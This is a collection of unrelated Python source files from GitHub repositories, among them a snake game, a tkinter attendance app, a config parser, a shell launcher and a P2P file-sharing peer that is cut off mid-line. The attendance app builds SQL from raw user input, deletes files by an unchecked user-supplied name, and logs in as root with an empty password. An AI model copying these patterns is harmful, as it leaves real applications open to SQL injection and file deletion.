+{"seq_id":"10118756086","text":"import pygame\r\nimport random\r\nfrom random import seed\r\nfrom random import randint\r\n\r\npygame.init()\r\nkey2 = 0\r\nW = 500\r\nH = 500\r\nwin = pygame.display.set_mode((W,H))\r\n\r\npygame.display.set_caption(\"Snek :)\")\r\n\r\nwhite = (255, 255, 255)\r\nred = (255, 0, 0)\r\ngreen = (0, 255, 0)\r\n\r\nfont = pygame.font.Font('freesansbold.ttf', 8)\r\nfont2 = pygame.font.Font('freesansbold.ttf', 20)\r\n\r\n\r\nb = False\r\nx = 40\r\ny = 40\r\nwidth = 18\r\nheight = 18\r\nvel = 20\r\nrate = 17\r\nlength = 1\r\ndire = \"R\"\r\ndiretemp = \"R\"\r\ncount = -5\r\ncountcond = 10\r\nscore = 0\r\nrun = True\r\nlevel = 1\r\nprestige = 0\r\ntext = font.render(f'SCORE: {score} PRESTIGE: {prestige}', True, white)\r\ntext1win = font2.render('Congratulations, you beat the game!', True, green)\r\ntext2win = font2.render(\"To play again, press 'space'. To quit, press 9.\", True, green)\r\ntext1lose = font2.render(\"You are as likely to be struck by lightning\", True, red)\r\ntext2lose = font2.render(\"as you are to achieve your dreams.\", True, red)\r\ntext3lose = font2.render(\"Try again with space, 9 to quit.\", True, red)\r\ntextPause = font2.render(\"Press 'u' to unpause.\", True, white)\r\ntextRect = text.get_rect()\r\ntextw1 = text1win.get_rect()\r\ntextw2 = text2win.get_rect()\r\ntextl1 = text1lose.get_rect()\r\ntextl2 = text2lose.get_rect()\r\ntextl3 = text3lose.get_rect()\r\ntextp = textPause.get_rect()\r\ntextRect.center = (80, 8)\r\ntextw1.center = (int(W/2) , int(H/2) - 75)\r\ntextw2.center = (int(W/2) , int(H/2) + 75)\r\ntextl1.center = (int(W/2) , int(H/2) - 100)\r\ntextl2.center = (int(W/2) , int(H/2))\r\ntextl3.center = (int(W/2) , int(H/2) + 100)\r\ntextp.center = (int(W/2) , int(H/2))\r\n\r\n#To Update GameState:\r\ngamebool = True\r\nwinbool = False\r\n\r\n#count is used to make sure the square doesn't move every update. it would be way too quick.\r\n#dire is direction, diretemp accepts input from keyboard and updates dire upon refresh of screen.\r\n\r\nmemlist = [[]]*103\r\nmemlist[0] = [x,y]\r\n\r\n#this is for storing positions.\r\n\r\nxf = 240\r\nyf = 260\r\n\r\n#food position\r\ndef gamestatereset():\r\n global x, prestige, yf, xf, memlist, winbool, gamebool, level, run, score, countcond, count, diretemp, dire, length, rate, y\r\n x = 40\r\n y = 40\r\n rate = 17\r\n length = 1\r\n dire = \"R\"\r\n diretemp = \"R\"\r\n count = -5\r\n countcond = 10\r\n score = 0\r\n run = True\r\n level = 1\r\n gamebool = True\r\n if winbool == True:\r\n prestige = prestige + 1\r\n else:\r\n prestige = 0\r\n winbool = False\r\n memlist = [[]]*103\r\n memlist[0] = [x,y]\r\n xf = 240\r\n yf = 260\r\n\r\ndef wincond():\r\n global winbool, gamebool\r\n winbool = True\r\n gamebool = False\r\n\r\ndef winScreen():\r\n global text1win, text2win, textw1, textw2\r\n win.blit(text1win, textw1)\r\n win.blit(text2win, textw2)\r\n\r\ndef losecond():\r\n global gamebool\r\n gamebool = False\r\n\r\ndef loseScreen():\r\n global text1lose, text2lose, text3lose, text3lose, textl1, textl2, textl3 \r\n win.blit(text1lose, textl1)\r\n win.blit(text2lose, textl2)\r\n win.blit(text3lose,textl3)\r\n\r\ndef eat():\r\n global rate, length, memlist, xf, yf, score, level, countcond\r\n if score == 100:\r\n wincond()\r\n length = length + 1\r\n memlist[length-1] = [x , y]\r\n xf = randint(1,24) * 20\r\n yf = randint(1,24) * 20\r\n while [xf,yf] in memlist:\r\n xf = randint(1,24) * 20\r\n yf = randint(1,24) * 20\r\n score = score + 1\r\n if score % 10 == 0:\r\n level = level + 1\r\n rate = rate - 1\r\n if score % 20 == 0:\r\n countcond = countcond - 1\r\n\r\ndef move():\r\n global x, y\r\n #global y\r\n if dire == \"R\":\r\n if x >= 480:\r\n losecond()\r\n else:\r\n x += vel\r\n if dire == \"L\":\r\n if x <= 0:\r\n losecond()\r\n else:\r\n x -= vel\r\n if dire == \"U\":\r\n if y <= 0:\r\n losecond()\r\n else:\r\n y -= vel\r\n if dire == \"D\":\r\n if y >= 480:\r\n losecond()\r\n else:\r\n y += vel\r\n\r\n for i in range(length):\r\n if i == length - 1:\r\n memlist[0] = [x,y]\r\n if i != length - 1:\r\n memlist[length - i - 1] = memlist[length - i - 2]\r\n collcheck()\r\n\r\n\r\ndef collcheck():\r\n global memlist\r\n for i in range(length):\r\n if memlist[0] == memlist[i] and i != 0:\r\n losecond()\r\n \r\ndef dispTEXT():\r\n global text, score\r\n text = font.render(f'SCORE: {score} PRESTIGE: {prestige}', True, white)\r\n win.blit(text,textRect)\r\n\r\ndef PauseScreen():\r\n global textPause, textp, b, key2\r\n win.blit(textPause,textp)\r\n pygame.display.update()\r\n key2 = pygame.key.get_pressed()\r\n\r\n\r\nwhile run:\r\n pygame.time.delay(rate)\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n run = False\r\n keys = pygame.key.get_pressed()\r\n\r\n if keys[pygame.K_p]:\r\n gamebool = False\r\n b = True\r\n PauseScreen()\r\n \r\n if keys[pygame.K_u]:\r\n gamebool = True\r\n b = False\r\n\r\n if b == True:\r\n continue\r\n \r\n if gamebool == True:\r\n if keys[pygame.K_LEFT]:\r\n if dire == \"R\":\r\n pass\r\n else:\r\n diretemp = \"L\"\r\n if keys[pygame.K_RIGHT]:\r\n if dire == \"L\":\r\n pass\r\n else:\r\n diretemp = \"R\"\r\n if keys[pygame.K_UP]:\r\n if dire == \"D\":\r\n pass\r\n else:\r\n diretemp = \"U\"\r\n if keys[pygame.K_DOWN]:\r\n if dire == \"U\":\r\n pass\r\n else:\r\n diretemp = \"D\"\r\n\r\n \r\n if count <= countcond:\r\n count = count + 1\r\n else:\r\n if memlist[0][0] == xf and memlist[0][1] == yf:\r\n eat()\r\n dire = diretemp\r\n move()\r\n count = 1\r\n \r\n win.fill((0,0,0))\r\n dispTEXT()\r\n pygame.draw.rect(win, (255,255,255), (xf + 4, yf + 4,10,10))\r\n \r\n for i in range(length):\r\n if i <= 10:\r\n A = 255 - 10 * i\r\n B = 0\r\n C = 10 * i\r\n if i > 10 and i <= 20:\r\n A = 155 - 5 * (i - 10)\r\n B = 5 * (i - 10)\r\n C = 100\r\n if i > 20 and i <= 30:\r\n A = 105 + (i - 20) * 2\r\n B = 50 + (i - 20) * 10\r\n C = 100 + (i - 20) * 10\r\n if i > 30 and i <= 50:\r\n A = 125 - (i - 30) * 5\r\n B = 150 + (i - 30) * 5\r\n C = 200 + (i - 30) * 1\r\n if i > 50 and i <= 70:\r\n A = 24 + (i - 50) * 9\r\n B = 244 - (i - 50) * 2\r\n C = 224 - (i - 50)\r\n if i > 70:\r\n A = 204 + (i - 70)\r\n B = A\r\n C = A\r\n pygame.draw.rect(win, (A,B,C), (memlist[i][0],memlist[i][1],width,height))\r\n \r\n elif winbool == True:\r\n winScreen()\r\n else:\r\n loseScreen()\r\n\r\n keys = pygame.key.get_pressed()\r\n if keys[pygame.K_y]:\r\n losecond()\r\n elif keys[pygame.K_z]:\r\n wincond()\r\n \r\n pygame.display.update()\r\n \r\n keys = pygame.key.get_pressed()\r\n if gamebool == False:\r\n if keys[pygame.K_9]:\r\n quit()\r\n if keys[pygame.K_SPACE]:\r\n gamestatereset()\r\n \r\n \r\n\r\n \r\n\r\npygame.quit()\r\n","repo_name":"Mondonor/snek","sub_path":"MakinSnek.py","file_name":"MakinSnek.py","file_ext":"py","file_size_in_byte":7388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42785693660","text":"import tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom PIL import ImageTk,Image\nimport os\nimport mysql.connector as mysql\n\n#connecting to database\ndb = mysql.connect(host='localhost',user='root',password='', database='face_recog_attendance_db')\ndbcursor = db.cursor()\n#---------------------------------------------------------------------------------\n\n#buttons container\nclass App:\n def __init__(self, window, window_title):\n self.window = window\n self.window.title(window_title)\n self.window.config(bg=\"#808080\")\n self.window.state(\"zoomed\")\n\n option = {\"padx\":5, \"pady\":5, \"fill\": BOTH}\n #create the left_frame\n self.left_frame = tk.Frame(self.window, bg='#808080')\n self.left_frame.pack(side=LEFT, padx=(150,5),expand=True)\n #self.left_frame.pack_propagate(False) \n self.start_attendance_bttn = Button(self.left_frame, text=\"Start Attendance\", command=self.strt_attendance,width=20)\n self.start_attendance_bttn.pack(side=TOP,**option)\n self.class_info_bttn = Button(self.left_frame, text=\"Class Info\", command=self.view_class_info, width=20)\n self.class_info_bttn.pack(side=TOP,**option)\n self.view_report_bttn = Button(self.left_frame, text=\"View Report\", command=self.report_attendance, width=20)\n self.view_report_bttn.pack(side=TOP, **option)\n self.register_student_bttn = Button(self.left_frame, text=\"Register Student\", command=self.register_student, width=20)\n self.register_student_bttn.pack(side=TOP, **option)\n self.remove_student_bttn = Button(self.left_frame, text=\"Remove Student\", command=self.remove_student)\n self.remove_student_bttn.pack(side=TOP, **option)\n self.logout_bttn = Button(self.left_frame, text=\"Log out\", command=self.logout)\n self.logout_bttn.pack(side=TOP, **option)\n #create the right frame\n self.right_frame = tk.Frame(self.window, bg='#808080',width=660, height=500)\n self.right_frame.pack(side=RIGHT, padx=(0,150), expand=True)\n self.right_frame.pack_propagate(False)\n #place the canvas in a frame \n self.canvas = tk.Canvas(self.right_frame, width=645, height=485)\n self.canvas.pack()\n self.immesense_logo = ImageTk.PhotoImage(Image.open(\"images/immesense.png\"))\n self.canvas.create_image(2, 1, anchor=NW, image=self.immesense_logo)\n \n # show window\n self.window.mainloop()\n #method to start attendance button\n def strt_attendance(self):\n self.window.destroy()\n os.system('py attendance_window.py')\n #method to view class info\n def view_class_info(self):\n self.window.destroy()\n os.system('py class_info_window.py')\n #method to attendance_report window\n def report_attendance(self):\n self.window.destroy()\n os.system('py attendance_report_window.py')\n #method to register student\n def register_student(self):\n self.window.destroy()\n os.system('py registration_window.py')\n #method to logout \n def logout(self):\n self.window.destroy()\n os.system('py login_window.py')\n#--------------------------------Creating TopLevel Window to remove studen------------------------------- \n def remove_student(self):\n self.remove_student_window = Toplevel()\n self.remove_student_window.title(\"REMOVE MEMBER\")\n self.remove_student_window.geometry(\"600x400\")\n self.remove_student_window.config(bg='#a6a6a6')\n\n frame = tk.Frame(self.remove_student_window, background=\"#a6a6a6\")\n frame.pack()\n #labels\n studentID_label = tk.Label(frame, text=\"Enter Student No.:\",font=('Helvitica', 12, 'bold'), bg=\"#a6a6a6\")\n studentID_label.grid(row=0, column=0, pady=(100,5))\n #entryboxes\n self.studentID_entrybx = tk.Entry(frame, width=30,)\n self.studentID_entrybx.grid(row=0, column=1, pady=(100,5))\n #buttons\n remove_button = tk.Button(frame, text=\"Remove\", command = self.remove_stud, width=15)\n remove_button.grid(row=2, column=1, pady=(50,5))\n exit_button = tk.Button(frame, text=\"Exit\", command = self.remove_student_window.destroy, width=15)\n exit_button.grid(row=3, column=1)\n \n def remove_stud(self):\n stud_no = self.studentID_entrybx.get()\n # quer = f\"SELECT * FROM student WHERE student_no = {stud_no}\"\n # dbcursor.execute(quer)\n # student_rec = dbcursor.fetchmany()\n # for rec in student_rec:\n # print(rec)\n if os.path.exists(\"students_images/\"+ stud_no +\".jpg\"): \n try:\n os.remove(\"students_images/\"+ stud_no +\".jpg\")\n del_query = f\"DELETE FROM student WHERE student_no = '{stud_no}'\"\n dbcursor.execute(del_query)\n db.commit()\n db.close()\n except Exception as e:\n messagebox.showerror(\"ERROR\", e)\n self.remove_student_window.destroy()\n self.remove_student()\n else:\n messagebox.showerror(\"ERROR\", message=\"Check your information provided...\")\n self.remove_student_window.destroy()\n self.remove_student()\n # delete entry in entrybox\n self.studentID_entrybx.delete(0, END)\n\n\nif __name__== \"__main__\":\n app = App(tk.Tk(), \"IMMESENSE Face Resognition Attendance System\")\n \n ","repo_name":"bomacs/IMMESENSE-","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":5440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20334100867","text":"from openerp import models, fields, api\nimport logging\n\nclass ProductBrand(models.Model):\n _name = 'product.brand'\n\n name = fields.Char('Brand Name', required=True)\n description = fields.Text('Description', translate=True)\n logo = fields.Binary('Logo File')\n product_ids = fields.One2many(\n 'product.template',\n 'product_brand_id',\n string='Brand Products',\n )\n products_count = fields.Integer(\n string='Number of products',\n compute='_get_products_count',\n )\n\n @api.one\n @api.depends('product_ids')\n def _get_products_count(self):\n self.products_count = len(self.product_ids)\n\n\nclass ProductTemplate(models.Model):\n _inherit = 'product.template'\n\n product_brand_id = fields.Many2one(\n 'product.brand',\n string='Brand',\n help='Select a brand for this product'\n\t)\n","repo_name":"Punto0/addons-fm","sub_path":"product_brand/product_brand.py","file_name":"product_brand.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"169855554","text":"\nfrom django import forms\nfrom blog.models import Post\n\n# NOTA: Not currently used to save data in the data base\n\nclass PostForm(forms.ModelForm):\n class Meta:\n model = Post\n # exclude = ['author', 'updated', 'created', ]\n fields = ['text']\n widgets = {\n 'text': forms.TextInput(attrs={\n 'id': 'post-text', \n 'required': True, \n 'placeholder': 'Say something...'\n }),\n }\n\n\n","repo_name":"ManuData/blog_penv","sub_path":"mysite/blog/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29238546942","text":"import logging\nimport re\nimport os\nimport warnings\n\nfrom configparser import ConfigParser\nfrom typing import Union, List, Any\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass CONFIGDICT(dict):\n \"\"\"This is a config dict wrapper\"\"\"\n pass\n \n\nCONFIG: CONFIGDICT = CONFIGDICT()\n\n\ndef readconfig(filepath: str) -> None:\n # Make sure we don't accidentally read configruations multiple times\n if CONFIG:\n return\n\n if not os.path.exists(filepath):\n raise FileNotFoundError(f'No config file exists with the name/path {filepath}.') \n\n cfg = ConfigParser()\n # Changing the optionxform enables case preservation of keys in configurations.\n cfg.optionxform = lambda option: option # type: ignore\n\n cfg.read(filepath)\n\n # Store TEMPLATE key/value pairs outside the CONFIG dict\n envspecifics: CONFIGDICT = CONFIGDICT()\n\n # Sections in the config file are flattened, so all configurations are placed on the same level\n for section in cfg:\n storedict = envspecifics if section == 'ENVIRONMENTSPECIFIC' else CONFIG\n \n for key, value in cfg[section].items():\n storedict[key] = simplevalueparser(value)\n\n # Manually set values from the ENVIRONMENTSPECIFIC section based on the ENVIRONMENT variable.\n for envkey, value in envspecifics.items():\n try:\n env = envkey.split('_')[0]\n key = envkey.split('_')[1]\n except Exception:\n warnings.warn(\n f'Key {envkey} is not a valid ENVIRONMENTSPECIFIC key.'\n )\n continue\n\n if env not in ('DEV', 'PROD'):\n warnings.warn(\n f'Environment specifier {env} is not a valid environment.'\n 'Valid options are DEV and PROD.'\n )\n continue\n \n # Skip all variables which are not for the current ENVIRONMENT\n if env != CONFIG['ENVIRONMENT']:\n continue\n \n if key in CONFIG:\n warnings.warn(\n f'Key {key} is already specified with value {CONFIG[key]}. '\n f'Overwriting the value for the environment-specific value {value}.'\n )\n\n # Set the key/value pair\n CONFIG[key] = value\n\n\ndef simplevalueparser(value: str) -> Union[str, bool, int, float, List[Any]]: \n # Case: Bools\n if value.lower() in ['true', 'false']:\n return value.lower() == 'true'\n \n # Case: Numbers\n # Match any number, which can be represented as <1> and <1.0>\n digitre = r'-?\\d+([.]\\d+)?'\n\n rematch = re.match(digitre, value)\n # Determine if the value is a number. Second check is to filter out IP adresses, for which\n # the RE also (partially) matches.\n if rematch and rematch.span(0)[1] == len(value):\n return int(value) if rematch.group(1) is None else float(value)\n\n # Case: List\n # Base case for lists:\n if value == '[]':\n return []\n\n if len(value) > 2 and value[0] == '[' and value[-1] == ']':\n result: list = []\n # All values are themselves cast to their respective types by the simplevalueparser\n for listvalue in value[1:-1].split(','):\n result.append(simplevalueparser(listvalue.strip()))\n\n return result\n\n # Base case: Return the un-altered string as value\n return value","repo_name":"CTxD/medid-crawler","sub_path":"source/config/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40947111037","text":"from dataclasses import dataclass\nimport operator\n\n\n@dataclass(frozen=True, order=True)\nclass Book:\n title: str\n author: str\n\n\nbooks = [\n Book(title=\"1984\", author=\"George Orwell\"),\n Book(title=\"The Martian Chronicles\", author=\"Ray Bradbury\"),\n Book(title=\"The Hobbit\", author=\"J.R.R. Tolkien\"),\n Book(title=\"Animal Farm\", author=\"George Orwell\"),\n Book(title=\"Fahrenheit 451\", author=\"Ray Bradbury\"),\n Book(title=\"The Lord of the Rings (1-3)\", author=\"J.R.R. Tolkien\"),\n Book(title=\"Harry Potter and the Sorcerer’s Stone\", author=\"J.K. Rowling\"),\n Book(title=\"To Kill a Mockingbird\", author=\"Harper Lee\"),\n]\n","repo_name":"natenka/advpyneng-examples-exercises","sub_path":"examples/15_itertools/groupby_dataclass.py","file_name":"groupby_dataclass.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"37"} +{"seq_id":"35778878504","text":"\n\"\"\"\nThis file is meant to be run by croshell.sh / croshell.ps1 and offers commandline arguments. The latter files not to be confused with croshell.py which is, just the python shell.\n\nArgument Parsing:\n* Script level.\n * This is system dependent and is hard in bash.\n * It remains a necessity because at system level one can dictate the enviroment, the interpretor, etc.\n* Python level:\n * system agnostic.\n * Benign syntax, but predetermines to a great extent what is being executed (which python, enviroment).\n* python library `fire`:\n * this is good for passing arguments to specfic python functions from commandline without writing specific argparsing for those functions.\n\nThe best approach is to use python and fire to pass process args of script and:\n * return a string to the script file to execute it.\n * or, execute it via terminal from within python.\n\nChoices made by default:\n* ipython over python\n* interactive is the default\n* importing the file to be run (as opposed to running it as main) is the default. The advantage of running it as an imported module is having reference to the file from which classes came. This is vital for pickling.\n\n\"\"\"\n\nimport argparse\nimport subprocess\nimport platform\nfrom pathlib import Path\n\n\ndef build_parser():\n parser = argparse.ArgumentParser(description=\"Generic Parser to launch crocodile shell.\")\n\n # POSITIONAL ARGUMENT (UNNAMED)\n # parser.add_argument(\"--read\", \"-file\", dest=\"file\", help=\"binary/python file path to read/interpret.\", default=\"\")\n\n # A FLAG:\n parser.add_argument(\"--module\", '-m', help=\"flag to run the file as a module as opposed to main.\", action=\"store_true\", default=False) # default is running as main, unless indicated by --module flag.\n parser.add_argument(\"--newWindow\", \"-w\", help=\"flag for running in new window.\", action=\"store_true\", default=False)\n parser.add_argument(\"--nonInteratctive\", \"-N\", help=\"flag for a non-interactive session.\", action=\"store_true\", default=False)\n parser.add_argument(\"--python\", \"-p\", help=\"flag to use python over IPython.\", action=\"store_true\", default=False)\n parser.add_argument(\"--fzf\", \"-F\", help=\"search with fuzzy finder for python scripts and run them\", action=\"store_true\", default=False)\n\n # OPTIONAL KEYWORD\n parser.add_argument(\"--version\", \"-v\", help=\"flag to print version.\", action=\"store_true\", default=False)\n parser.add_argument(\"--read\", \"-r\", dest=\"read\", help=\"read a binary file.\", default=\"\")\n parser.add_argument(\"--file\", \"-f\", dest=\"file\", help=\"python file path to interpret\", default=\"\")\n parser.add_argument(\"--cmd\", \"-c\", dest=\"cmd\", help=\"python command to interpret\", default=\"\")\n parser.add_argument(\"--terminal\", \"-t\", dest=\"terminal\", help=f\"specify which terminal to be used. Default console host.\", default=\"\") # can choose `wt`\n parser.add_argument(\"--shell\", \"-S\", dest=\"shell\", help=f\"specify which shell to be used. Defaults to CMD.\", default=\"\")\n\n args = parser.parse_args()\n # print(f\"Crocodile.run: args of the firing command = {args.__dict__}\")\n\n # ==================================================================================\n # flags processing\n interactivity = '' if args.nonInteratctive else '-i'\n interpreter = 'python' if args.python else 'ipython'\n\n if args.cmd != \"\":\n import textwrap\n code = f\"from crocodile.toolbox import *\\n{textwrap.dedent(args.cmd)}\"\n exec(code)\n return None # DONE\n elif args.fzf:\n from machineconfig.utils.utils import display_options, P\n file = display_options(msg=\"Choose a python file to run\", options=list(P.cwd().search(\"*.py\", r=True)), fzf=True, multi=False, )\n if len(file) == 0: return None\n res = f\"\"\"ipython --no-banner -i -m crocodile.croshell -- --file \"{file}\" \"\"\"\n elif args.file != \"\" or args.read != \"\":\n code_text = \"\"\n if args.file != \"\":\n file = Path(args.file).expanduser().absolute()\n if args.module:\n code_text = fr\"\"\"\n# >>>>>>> Importing File <<<<<<<<<\nimport sys\nsys.path.append(r'{file.parent}')\nfrom {file.stem} import *\n{args.cmd if args.cmd != '' else ''}\n\"\"\"\n else:\n code_text = f\"\"\"\n# >>>>>>> Executing File <<<<<<<<<\n__file__ = P(r'{file}')\n{file.read_text(encoding=\"utf-8\")}\n\"\"\"\n\n elif args.read != \"\": \n code_text = f\"\"\"\n# >>>>>>> Reading File <<<<<<<<<\np = P(r\\'{str(args.read).lstrip()}\\').absolute()\ntry:\n dat = p.readit()\n if type(dat) == tb.Struct: dat.print(as_config=True, title=p.name)\n else: print(f\"Succcesfully read the file {{p.name}}\")\nexcept Exception as e:\n print(e)\n\n\"\"\"\n\n # next, write code_text to file at ~/tmp_results/shells/python_readfile_script.py using open:\n base = Path.home().joinpath(\"tmp_results/shells\")\n base.mkdir(parents=True, exist_ok=True)\n code_file = base.joinpath(\"python_readfile_script.py\")\n code_file.write_text(code_text, encoding=\"utf-8\")\n res = f\"\"\"ipython --no-banner -i -m crocodile.croshell -- --file \"{code_file}\" \"\"\"\n\n else: # just run croshell.py interactively\n res = f\"{interpreter} {interactivity} --no-banner -m crocodile.croshell\" # --term-title croshell\n # Clear-Host;\n # # --autocall 1 in order to enable shell-like behaviour: e.g.: P x is interpreted as P(x)\n\n if platform.system() == \"Windows\": return subprocess.run([f\"powershell\", \"-Command\", res], shell=True, capture_output=False, text=True)\n else: return subprocess.run([res], shell=True, capture_output=False, text=True)\n\n\nif __name__ == \"__main__\":\n build_parser()\n","repo_name":"thisismygitrepo/crocodile","sub_path":"myresources/crocodile/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":5652,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"73325138347","text":"from game.shared.color import Color\n\n\n\nMAX_X = 900\nMAX_Y = 600\nSCREEN_SIZE_MODIFIER = 2\nCOLUMNS = MAX_X / 22.5\nROWS = MAX_Y / 30\nCELL_SIZE = 15\nFRAME_RATE = 10\nFONT_SIZE = 15\nCAPTION = \"Cycle Game\"\n# the head is one long\nSNAKE_LENGTH = 1\n# the tail is this many long, use a larger number for longer tails/trails on cycle\nTAIL_LENGTH = 63\nWHITE = Color(255, 255, 255)\nRED = Color(255, 0, 0)\nYELLOW = Color(255, 255, 0)\nGREEN = Color(0, 255, 0)\nBLUE = Color(0, 0, 255)\n","repo_name":"Bambyboi/CSE210-Cycle","sub_path":"cycle/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34499388071","text":"#! /usr/bin/python3\n# mcb.pyw - Saves and loads pieces of text to the clipboard.\n# Usage: python3 mcb.pyw save - Saves clipboard to keyword.\n# python3 mcb.pyw - Loads keyword to clipboard.\n# python3 mcb.pyw list - Loads all keywords to clipboard.\n# python3 mcb.pyw delete - Delete all keyword\n# python3 mcb.pyw delete - Delete keyword\n\nimport shelve, pyperclip, sys\n\nmcbShelf = shelve.open('mcb')\nif len(sys.argv) == 3:\n keyword = sys.argv[2]\n if sys.argv[1].lower() == 'save':\n mcbShelf[keyword] = pyperclip.paste()\n else:\n del mcbShelf[keyword]\nelif len(sys.argv) == 2:\n if sys.argv[1].lower() == 'list':\n pyperclip.copy(str(list(mcbShelf.keys())))\n elif sys.argv[1] in mcbShelf:\n pyperclip.copy(mcbShelf[sys.argv[1]])\n elif sys.argv[1].lower() == 'delete':\n mcbShelf.clear()\n\nmcbShelf.close()\n","repo_name":"pirent/python-playground","sub_path":"automate_stuffs/chapter8/mcb.pyw","file_name":"mcb.pyw","file_ext":"pyw","file_size_in_byte":875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12701363216","text":"# pacotes default do python\nimport os # Utilitys do sistema operacional\nimport sys # Para pegar folder no qual os dados estão\nimport glob # Percorre com regex os files de um folder\nimport json # Utilizado para fazer parse da mensagem\nfrom collections import defaultdict # Utilizado como estrutura de dados de um peer para guardar quais peers possuem quais arquivos\nimport random # Utilizado para aceitar randomicamente requisição de download\nimport time # Utilizado para ajustar prints de um peer \nimport socket # Utilizado para criar sockets\nimport threading # Utilizado para fazer as threads\nfrom typing import List, Dict, Tuple # Utilizado para indicar tipos de variáveis\n\n# pacotes não default\nfrom tqdm import tqdm # Utilizado para fazer barra de progresso do download\nfrom message import Message\n\n\nclass Peer:\n\n PEER_ADRESS = socket.gethostbyname(socket.gethostname())\n\n SERVER_ADDRESS = \"127.0.1.1\"\n SERVER_PORT = 10098\n SERVER = (SERVER_ADDRESS, SERVER_PORT)\n BUFFERSIZE = 4096\n\n def __init__(self, file_folder_path, port):\n\n # Define peer\n self.PEER_PORT = int(port)\n self.PEER = (self.PEER_ADRESS, self.PEER_PORT)\n\n # Cria socket TCP\n self.TCPSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.TCPSocket.bind(self.PEER) \n self.TCPSocket.listen()\n\n # Cria socket UDP\n self.UDPClientSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n # Variaveis auxiliares\n self.network_peers = defaultdict(lambda:[]) # Guarda quais arquivos cada peer tem\n self.file_folder_path:str = file_folder_path # Guarda pasta onde os arquvios de áudio estão.\n files_path = [file_name for file_name in glob.glob(f\"{file_folder_path}/*\")] # Lista todos os arquivos da pasta\n self.files:str = \" \".join([os.path.basename(file_name) for file_name in files_path]) # String contendo arquivo para transmissão de informação\n self.menu_str:str = \"\\nDigite a requisição [JOIN, SEARCH, DOWNLOAD, LEAVE]:\"\n\n def _handle_download(self):\n while True:\n sender_socket, _ = self.TCPSocket.accept() \n # if below code is executed, that means the sender is connected\n data = sender_socket.recv(self.BUFFERSIZE)\n recv_msg = json.loads(data.decode('utf-8'))\n requested_file = recv_msg[\"content\"]\n\n file_path = os.path.join(self.file_folder_path, requested_file)\n thread = threading.Thread(target=self._receive_download, args=(file_path, sender_socket,))\n thread.start()\n thread.join()\n\n def _receive_download(self, file_path, sender_socket):\n\n filesize = os.path.getsize(file_path)\n prop_accept = 0.5\n chance_accept = random.uniform(0,1)\n if chance_accept <= prop_accept:\n msg = Message(content=None, msg_type=\"DOWNLOAD_ACEITO\", sender=self.PEER, extra_info=filesize)\n sender_socket.sendall(msg.to_json(\"utf-8\"))\n #with tqdm(range(filesize), f\"Sending {requested_file}\", unit=\"B\", unit_scale=True, unit_divisor=1024) as progress_bar:\n with open(file_path, \"rb\") as f:\n while True:\n bytes_read = f.read(self.BUFFERSIZE) # Lê bytes do arquivo\n if not bytes_read: \n break # Transmissão do arquivo completa\n\n sender_socket.sendall(bytes_read)\n # progress_bar.update(len(bytes_read))\n else:\n msg = Message(content=None, msg_type=\"DOWNLOAD_NEGADO\", sender=self.PEER, extra_info=filesize)\n sender_socket.sendall(msg.to_json(\"utf-8\"))\n\n sender_socket.close()\n\n \n \n def _receive(self):\n while True:\n data, _ = self.UDPClientSocket.recvfrom(self.BUFFERSIZE)\n recv_msg = json.loads(data.decode('utf-8')) # Transforma json em dict\n thread = threading.Thread(target=self._handle_request, args=(recv_msg,))\n thread.start()\n thread.join()\n\n def _handle_request(self, recv_msg):\n\n peer = tuple(recv_msg[\"sender\"]) # Peer que fez a requisição\n msg_type = recv_msg[\"msg_type\"] # Tipo de requisição\n content = recv_msg[\"content\"] # Conteúdo da requisição\n\n if msg_type == \"JOIN_OK\":\n self._handle_join()\n\n elif msg_type == \"UPDATE_OK\":\n self._handle_update()\n\n elif msg_type == \"LEAVE_OK\":\n self._handle_leave() # No futuro preciso desligar o client aqui\n\n elif msg_type == \"ALIVE\":\n return self._handle_alive()\n\n elif msg_type == \"SEARCH\":\n filename = recv_msg[\"extra_info\"]\n self._handle_search(content, filename)\n\n def _handle_join(self):\n print(f\"Sou o peer [{self.PEER_ADRESS}]:[{self.PEER_PORT}] com arquivos {self.files}\\n\")\n\n def _handle_update(self):\n pass\n #print(\"Informações atualizadas com sucesso.\")\n\n def _handle_search(self, content, filename):\n parse_msg = content.strip('[]').split()\n for peer_str in parse_msg:\n address, port = peer_str.split(':')\n self.network_peers[(address, int(port))].append(filename)\n print(f\"Peers com arquivo solicitado: {content}\")\n\n def _handle_leave(self):\n sys.exit(\"Desconectado\")\n\n def _handle_alive(self): \n msg = Message(content=None, msg_type=\"ALIVE_OK\", sender=self.PEER)\n self.UDPClientSocket.sendto(msg.to_json(\"utf-8\"), self.SERVER)\n\n def _request(self):\n while True:\n time.sleep(0.1)\n request = input(self.menu_str)\n thread = threading.Thread(target=self._handle_write, args=(request,))\n thread.start()\n thread.join()\n\n def _handle_write(self, request):\n command, *msg = request.split()\n command = command.upper()\n\n if command == \"JOIN\":\n self.join()\n\n elif command == \"SEARCH\":\n msg_len = len(msg)\n if msg_len == 0: print(\"Faltou o nome do arquivo.\")\n 